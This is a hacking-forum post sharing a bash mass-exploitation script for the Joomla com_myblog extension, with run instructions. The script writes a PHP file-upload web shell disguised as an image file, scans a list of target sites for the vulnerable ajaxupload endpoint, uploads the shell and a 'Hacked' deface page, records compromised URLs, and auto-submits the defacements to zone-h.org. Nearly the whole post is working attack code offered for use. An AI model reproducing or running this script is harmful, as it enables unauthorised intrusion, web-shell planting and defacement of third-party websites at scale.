[bash] Joomla com_myblog exploiter (1 Viewer)

Joined
Mar 11, 2016
Credits
0
Rating - 0%
Hello guys i will share with you another great code, you will enable to exploit com_myblog joomla with this code

- Auto Submit Zone-H
- Auto Upload Shell
---
com_myblog auto exploiter
--
- 1 . dos2unix exp.sh
- 2 . chmod +x exp.sh
- 3 . ./exp.sh

Code:
#!/bin/bash
#by Gantengers Crew
#com_myblog
#25 Nov 2015 Update !
cat > mastermaling0day.php.xxxjpg <<_EOF
<?php
error_reporting(0);
if(isset($_GET['mastermaling0day']))
{
echo "<h2></h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\"></label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br /><br />
<input type=\"submit\" name=\"default\" value=\"Upload\">
</form>";

{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo "Rand(100-100): " . "" . $_FILES["file"]["name"];
}
}
echo "<html><title> Hacked </title><style>body {background-color:black;}</style><center><br><br><br><h2 style="color:white;"> Your system GoT owned by Alfabetovirtual </h2><br><img src="http://oi44.tinypic.com/2nl7jvl.jpg"></center></html>"
?>
_EOF
ZoneH(){
if [ -f "tmp/empes.txt" ];then
   urlnya=$(cat tmp/empes.txt)
       curl --silent -d "defacer=Alfabetovirtual&domain1=${urlnya}&hackmode=15&reason=1" \
        --header "Host: www.zone-h.org" \
        --header "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0" \
        --header "Accept-Language: en-US,en;q=0.5" \
        --header "Connection: keep-alive" \
        --header "Referer: http://zone-h.org/notify/single" \
        --request POST "http://zone-h.org/notify/single" -o tmp//result1.txt >/dev/null
        cat tmp/result1.txt | sed ':a;N;$!ba;s/\n/ /g' | awk '{gsub("<li>","\n")}1' | awk '{gsub("</li>","\n")}1' | grep "name=\"domain" | awk '{gsub(">","?")}1' | awk '{gsub("<","?")}1' | cut -d '?' -f 5 > tmp/Result.txt
            FILEDX="tmp/Result.txt"
           RDOM1=$(sed -n '1p' < $FILEDX)
            echo $RDOM1 | grep -i "OK" >> /dev/null;warnai=$?
          if [ $warnai -eq 0 ];then
           WARNA="\033[1m\e[1;32m[OK]\E[0m"
           echo "$urlnya" >> log/postOK.log
            else
           WARNA="\033[1m\e[1;31m[ERROR]\E[0m"
           echo "$urlnya" >> log/postError.log
          fi
    echo -e "[+] Zone-H : $urlnya $WARNA"
    echo "$urlnya" >> defaced.txt
fi
}
UploadS(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "fileToUpload=@${namashell}" \
--request POST "http://${1}/index.php?option=com_myblog&task=ajaxupload"
}
UploadC(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "fileToUpload=@${namafile}" \
--request POST "http://${1}/index.php?option=com_myblog&task=ajaxupload"
}
CheckS(){
letaknya=$(cat tmp/resp.txt | grep "${urlnya}" | cut -d "'" -f 2)
echo "+ Upload Shell => ${urlnya}"
curl --silent --max-time 10 --connect-timeout 10 ${letaknya} -o tmp/cs.txt
if [ ! -f tmp/cs.txt ];then
echo "+ $urlnya : RTO"
continue
fi
cat tmp/cs.txt | grep -i "Hacked" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo -e "+ $letaknya : \e[1;32m[Upload Shell Success]\E[0m"
echo "$letaknya" >> shell.txt
else
echo -e "+ $urlnya : \e[1;31m[Upload Shell Failed]\E[0m"
fi
}
CheckD(){
letaknya=$(cat tmp/resp.txt | grep "${urlnya}" | cut -d "'" -f 2)
curl --silent --max-time 10 --connect-timeout 10 ${letaknya} -o tmp/cd.txt
if [ ! -f tmp/cd.txt ];then
echo "+ $urlnya : RTO"
continue
fi
cat tmp/cd.txt | grep -i "hacked" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo -e "+ ${letaknya} : \e[1;32m[Exploit Success]\E[0m"
echo "${letaknya}" >> success.txt
echo "${letaknya}" >> tmp/empes.txt
else
echo -e "+ $urlnya : \e[1;31m[Exploit Failed]\E[0m"
fi
}
CheckV(){
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/index.php?option=com_myblog&task=ajaxupload" -o tmp/cv.txt
if [ ! -f tmp/cv.txt ];then
echo "+ $urlnya : RTO"
continue
fi
cat tmp/cv.txt | grep "{error: 'No file has been uploaded.', msg: '' }\|No file has been uploaded\|file has been uploaded." > /dev/null;cv=$?
if [ $cv -eq 1 ];then
echo "+ $urlnya : Not Vuln"
continue
else
echo "+ $urlnya : Vuln"
fi
}
Exploit(){
for url in `cat $list`
do
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1')
if [ ! -f load.txt ];then
touch load.txt
fi
cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
echo $urlnya >> load.txt
else
#udah pernah di load di file load.txt
#kalau mau load ulang,silakan hapus file load.txt
continue
fi
CheckV $urlnya
UploadC $urlnya
CheckD $urlnya
UploadS $urlnya
CheckS $urlnya
ZoneH
rm -f tmp/*
done
}
Lengkap(){
namashell="mastermaling0day.php.xxxjpg"
if [ ! -d log ];then
mkdir log
fi
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -f $namafile ];then
echo "[?] file $namafile not found"
exit
fi
if [ ! -f $list ];then
echo "[?] file $list not found"
exit
fi
}
read -p "+ Enter name of File = " namafile
read -p "+ Enter list target = " list
Lengkap
Exploit
 

Users who are viewing this thread

Top